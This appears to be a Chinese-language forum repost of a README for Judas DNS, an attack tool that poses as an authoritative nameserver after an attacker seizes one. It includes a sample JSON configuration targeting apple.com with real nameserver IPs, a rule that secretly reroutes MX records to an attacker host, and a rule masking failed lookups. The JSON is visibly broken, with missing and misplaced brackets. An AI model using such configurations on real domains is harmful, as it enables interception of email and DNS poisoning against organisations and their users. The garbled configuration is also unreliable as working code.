Judas DNS –名称服务器DNS中毒攻击工具
Judas DNS是一个名称服务器DNS中毒攻击工具,它充当DNS代理服务器的作用,旨在代替被接管的名称服务器进行部署以执行有针对性的利用。Judas通过将所有DNS查询代理到域的合法名称服务器来工作。魔力与Judas的规则配置一起提供,可让您根据源IP或DNS查询类型来更改DNS响应。这使攻击者可以配置恶意名称服务器,以进行某些操作,例如有选择地重新路由来自指定源IP范围的入站电子邮件(通过修改的MX记录),设置非常长的TTL以保留有毒记录的缓存等。如何使用Judas DNS名称服务器DNS中毒攻击工具以下是针对犹大的示例场景的示例配置,其中攻击者已破坏/接管了苹果公司的权威名称服务器之一(针对apple.com):1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
{
"version": "1.0.0",
"port": 2248,
"dns_query_timeout": 10000,
"target_nameservers": [ "17.254.0.59", "17.254.0.50", "17.112.144.50", "17.112.144.59", "17.171.63.30", "17.171.63.40", "17.151.0.151", "17.151.0.152" ,
"rules": [
{
"name": "Secretly redirect all emails coming from 127.0.0.1!",
"query_type_matches": [ "MX" ,
"ip_range_matches": [ "127.0.0.1/32" ,
"modifications": [
{
"answer": [
{
"name": "apple.com",
"type": 15,
"class": 1,
"ttl": 10,
"priority": 10,
"exchange": "hacktheplace.localhost"
}
}
},
{
"name": "Make all responses NOERROR even if they've failed.",
"query_type_matches": [ "*" ,
"modifications": [
{
"header": {
"rcode": 0
}
}
}
}
上面的配置值用途如下:
[*]version:配置文件格式版本(目前始终为1.0.0)。
[*]port: Judas端口应在其上运行。
[*]dns_query_timeout:放弃上游目标名称服务器的回复之前要等待的毫秒数。
[*]target_nameservers:您目标域的合法名称服务器,所有DNS查询将在此处代表所有发出请求的客户端从Judas发送。
[*]规则:对DNS响应进行修改(如果匹配)的规则列表。
[*]名称:给定规则的名称。
[*]query_type_matches:要匹配的查询类型的列表,例如CNAME,A等。也可以指定通配符(*)以匹配任何查询类型。
[*]ip_range_matches:要匹配的IP范围列表。用于选择性地欺骗对特定IP地址范围的响应。
[*]修改:请参见本自述文件的“修改”部分。
页:
[1]